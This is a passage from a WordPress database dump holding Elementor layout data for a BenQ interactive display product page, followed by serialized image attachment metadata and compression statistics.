password.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"91f7a3f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5caf9fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2d41625\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>NFC Pen<\\/strong><\\/p><p>With a simple tap of the NFCPen at the sensor, you can instantly activate the EZWrite 4.1 annotation app, and begin to annotate with different colors. Built with NFC technology, the NFCPen is battery-free and doesn\'t require device pairing. It is also waterproof while being able to withstand long-term use.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c2fd161\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0fb3584\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-10.png\",\"id\":2827}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"57d3c62\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"751b521\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2e35cd2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-04.jpg\",\"id\":2828}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"374a056\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ec7b171\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Front Buttons<\\/strong> <br \\/>The front buttons, including Power, Home, Back, Setting, and Volume, further enhance the convenience of using IFPs and help teachers easily control the pace of lectures.<\\/p><p><strong>Instant Plug and Play<\\/strong> <br \\/>RP704K can save you from the hassles of complicated setup. Simply connect to a PC via USB and you\\u2019re all set to deliver compelling IFP touch-enhanced lessons.<\\/p><p><strong>Parental Control<\\/strong> <br \\/>BenQ IFPs come with website control feature that blocks certain websites by configuring proxy server settings, which is useful for preventing students from accessing inappropriate content.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c06c26c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cdee68c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c5aa819\",\"elType\":\"widget\",\"settings\":{\"title\":\"Display Management Support\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5fcf286\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0fcf021\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"137f9bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Multiple Display Administrator (MDA)<\\/strong><\\/p><p>Multiple Display Administrator (MDA) allows school IT to remotely control the general display settings of IFPs and schedule their on\\/off times, which helps to create hassle-free maintenance.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"61de455\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5d041e0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-05.jpg\",\"id\":2829}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"85858fd\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"630131a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c81a461\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-06.jpg\",\"id\":2830}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6d09571\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7562601\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>EasySetting<\\/strong><\\/p><p>Install Android\\u2122 apps for a selection of displays through the BenQ cloud server. EasySetting can save you from repetitive manual installation.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65cdaaa\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2b1c982\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ce849b0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Over-the-Air Update (OTA)<\\/strong><\\/p><p>Upgrade your displays with the latest BenQ firmware via BenQ\\u2019s OTA update support to keep them running smoothly at all times.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5ce7f62\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3400375\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-07.jpg\",\"id\":2831}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fa35854\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"83a22ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ef462ee\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c554c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(4879,2822,'_wp_attached_file','2019/01/rp750k-22.jpg'),(4880,2822,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:560;s:6:\"height\";i:352;s:4:\"file\";s:21:\"2019/01/rp750k-22.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"rp750k-22-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"rp750k-22-300x189.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"rp750k-22-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"rp750k-22-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:19:\"rp750k-22-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(4881,2822,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:13.67296102852551342721199034713208675384521484375;s:5:\"bytes\";i:8508;s:11:\"size_before\";i:62225;s:10:\"size_after\";i:53717;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.6899999999999995026200849679298698902130126953125;s:5:\"bytes\";i:890;s:11:\"size_before\";i:7615;s:10:\"size_after\";i:6725;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.2599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:1936;s:11:\"size_before\";i:14595;s:10:\"size_after\";i:12659;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.339999999999999857891452847979962825775146484375;s:5:\"bytes\";i:1550;s:11:\"size_before\";i:12560;s:10:\"size_after\";i:11010;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.050000000000000710542735760100185871124267578125;s:5:\"bytes\";i:4132;s:11:\"size_before\";i:27455;s:10:\"size_after\";i:23323;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}}}'),(4882,2823,'_wp_attached_file','2019/01/rp750k-01.jpg'),(4883,2823,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:510;s:6:\"height\";i:361;s:4:\"file\";s:21:\"2019/01/rp750k-01.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"rp750k-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"rp750k-01-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"rp750k-01-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"rp750k-01-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:19:\"rp750k-01-20x14.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:14;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4884,2823,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:7.238692704644339670494446181692183017730712890625;s:5:\"bytes\";i:3577;s:11:\"size_before\";i:49415;s:10:\"size_after\";i:45838;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.19000000000000039079850466805510222911834716796875;s:5:\"bytes\";i:431;s:11:\"size_before\";i:5994;s:10:\"size_after\";i:5563;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.87000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:886;s:11:\"size_before\";i:11259;s:10:\"size_after\";i:10373;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.37000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:657;s:11:\"size_before\";i:10308;s:10:\"size_after\";i:9651;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.339999999999999857891452847979962825775146484375;s:5:\"bytes\";i:1603;s:11:\"size_before\";i:21854;s:10:\"size_after\";i:20251;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4885,2824,'_wp_attached_file','2019/01/rp750k-02.jpg'),(4886,2824,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:510;s:6:\"height\";i:330;s:4:\"file\";s:21:\"2019/01/rp750k-02.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"rp750k-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"rp750k-02-300x194.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"rp750k-02-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"rp750k-02-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:19:\"rp750k-02-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4887,2824,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.65924689296976435315400522085838019847869873046875;s:5:\"bytes\";i:5026;s:11:\"size_before\";i:75474;s:10:\"size_after\";i:70448;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.160000000000000142108547152020037174224853515625;s:5:\"bytes\";i:809;s:11:\"size_before\";i:9911;s:10:\"size_after\";i:9102;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.79999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:1197;s:11:\"size_before\";i:17611;s:10:\"size_after\";i:16414;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.089999999999999857891452847979962825775146484375;s:5:\"bytes\";i:971;s:11:\"size_before\";i:13697;s:10:\"size_after\";i:12726;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.980000000000000426325641456060111522674560546875;s:5:\"bytes\";i:2049;s:11:\"size_before\";i:34255;s:10:\"size_after\";i:32206;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4888,2825,'_wp_attached_file','2019/01/rp750k-08.png'),(4889,2825,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:360;s:6:\"height\";i:333;s:4:\"file\";s:21:\"2019/01/rp750k-08.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"rp750k-08-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"rp750k-08-300x278.png\";s:5:\"width\";i:300;s:6:\"height\";i:278;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"rp750k-08-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"rp750k-08-360x300.png\";s:5:\"width\";i:360;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:19:\"rp750k-08-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4890,2825,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:8.8780661999065468847902593552134931087493896484375;s:5:\"bytes\";i:23370;s:11:\"size_before\";i:263233;s:10:\"size_after\";i:239863;s:4:\"time\";d:0.35999999999999998667732370449812151491641998291015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.230000000000000426325641456060111522674560546875;s:5:\"bytes\";i:2150;s:11:\"size_before\";i:26122;s:10:\"size_after\";i:23972;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.230000000000000426325641456060111522674560546875;s:5:\"bytes\";i:3280;s:11:\"size_before\";i:77575;s:10:\"size_after\";i:74295;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.6899999999999995026200849679298698902130126953125;s:5:\"bytes\";i:4986;s:11:\"size_before\";i:46644;s:10:\"size_after\";i:41658;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.4700000000000006394884621840901672840118408203125;s:5:\"bytes\";i:12954;s:11:\"size_before\";i:112892;s:10:\"size_after\";i:99938;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}}}'),(4891,2826,'_wp_attached_file','2019/01/rp750k-09.png'),(4892,2826,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:360;s:6:\"height\";i:333;s:4:\"file\";s:21:\"2019/01/rp750k-09.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"rp750k-09-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"rp750k-09-300x278.png\";s:5:\"width\";i:300;s:6:\"height\";i:278;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"rp750k-09-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"rp750k-09-360x300.png\";s:5:\"width\";i:360;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:19:\"rp750k-09-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4893,2826,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:244293;s:10:\"size_after\";i:244293;s:4:\"time\";d:0.32999999999999996003197111349436454474925994873046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:22995;s:10:\"size_after\";i:22995;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:67886;s:10:\"size_after\";i:67886;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:56469;s:10:\"size_after\";i:56469;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:96943;s:10:\"size_after\";i:96943;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}}}'),(4894,2827,'_wp_attached_file','2019/01/rp750k-10.png'),(4895,2827,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:360;s:6:\"height\";i:333;s:4:\"file\";s:21:\"2019/01/rp750k-10.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"rp750k-10-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"rp750k-10-300x278.png\";s:5:\"width\";i:300;s:6:\"height\";i:278;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"rp750k-10-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"rp750k-10-360x300.png\";s:5:\"width\";i:360;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:19:\"rp750k-10-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4896,2827,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:2.7859391897711720531560786184854805469512939453125;s:5:\"bytes\";i:5822;s:11:\"size_before\";i:208978;s:10:\"size_after\";i:203156;s:4:\"time\";d:0.270000000000000017763568394002504646778106689453125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.109999999999999875655021241982467472553253173828125;s:5:\"bytes\";i:727;s:11:\"size_before\";i:23361;s:10:\"size_after\";i:22634;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:66066;s:10:\"size_after\";i:66066;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:35397;s:10:\"size_after\";i:35397;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.04999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:5095;s:11:\"size_before\";i:84154;s:10:\"size_after\";i:79059;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}}}'),(4897,2828,'_wp_attached_file','2019/01/rp750k-04.jpg'),(4898,2828,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:560;s:6:\"height\";i:352;s:4:\"file\";s:21:\"2019/01/rp750k-04.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"rp750k-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"rp750k-04-300x189.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"rp750k-04-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"rp750k-04-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:19:\"rp750k-04-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4899,2828,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:7.3861639782813224286428521736524999141693115234375;s:5:\"bytes\";i:6516;s:11:\"size_before\";i:88219;s:10:\"size_after\";i:81703;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.769999999999999573674358543939888477325439453125;s:5:\"bytes\";i:695;s:11:\"size_before\";i:8949;s:10:\"size_after\";i:8254;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.95000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:1614;s:11:\"size_before\";i:20308;s:10:\"size_after\";i:18694;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.410000000000000142108547152020037174224853515625;s:5:\"bytes\";i:1083;s:11:\"size_before\";i:16895;s:10:\"size_after\";i:15812;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:3124;s:11:\"size_before\";i:42067;s:10:\"size_after\";i:38943;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4900,2829,'_wp_attached_file','2019/01/rp750k-0